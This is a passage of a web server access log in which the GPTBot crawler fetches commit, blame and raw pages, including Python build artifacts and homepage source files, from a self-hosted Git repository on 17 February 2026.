AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 9936] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10963] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:09:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10962] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:09:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10965] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10962] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md" +[17/Feb/2026:13:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 9540] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:13:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 48957] [Gzip 17.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9505] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:13:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:13:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 8597989] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:13:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 18349] [Gzip 11.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:13:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1069] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:13:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 48928] [Gzip 17.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 17153] [Gzip 9.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:13:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 22899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 17182] [Gzip 9.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:13:10:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 8940517] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:13:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 3141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:13:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 9928] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:13:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 3636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:13:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 18321] [Gzip 11.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:13:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 22899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 13011] [Gzip 6.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:13:10:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 3141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:13:10:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:13:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:13:10:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 3636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:13:10:12 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" +[17/Feb/2026:13:10:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13144] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services" +[17/Feb/2026:13:10:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1.diff" [Client 74.7.227.38] [Length 3429231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" +[17/Feb/2026:13:10:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/.gitignore" [Client 74.7.227.38] [Length 11985] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore" +[17/Feb/2026:13:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm" [Client 74.7.227.38] [Length 10166] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" +[17/Feb/2026:13:10:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" [Client 74.7.227.38] [Length 10151] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" +[17/Feb/2026:13:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx" [Client 74.7.227.38] [Length 12743] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" +[17/Feb/2026:13:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13136] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services" +[17/Feb/2026:13:10:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 16545] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:10:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 17340] [Gzip 9.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6" [Client 74.7.227.38] [Length 17056] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6" +[17/Feb/2026:13:10:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" [Client 74.7.227.38] [Length 15370] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" +[17/Feb/2026:13:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 74.7.227.38] [Length 16958] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" [Client 74.7.227.38] [Length 10795] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets" +[17/Feb/2026:13:10:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/README.md" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/README.md" +[17/Feb/2026:13:10:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e.patch" [Client 74.7.227.38] [Length 287418] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e" +[17/Feb/2026:13:10:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" [Client 74.7.227.38] [Length 26302] [Gzip 5.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:13:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" [Client 74.7.227.38] [Length 15274] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" +[17/Feb/2026:13:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13141] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services" +[17/Feb/2026:13:10:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 11283] [Gzip 4.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:10:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, 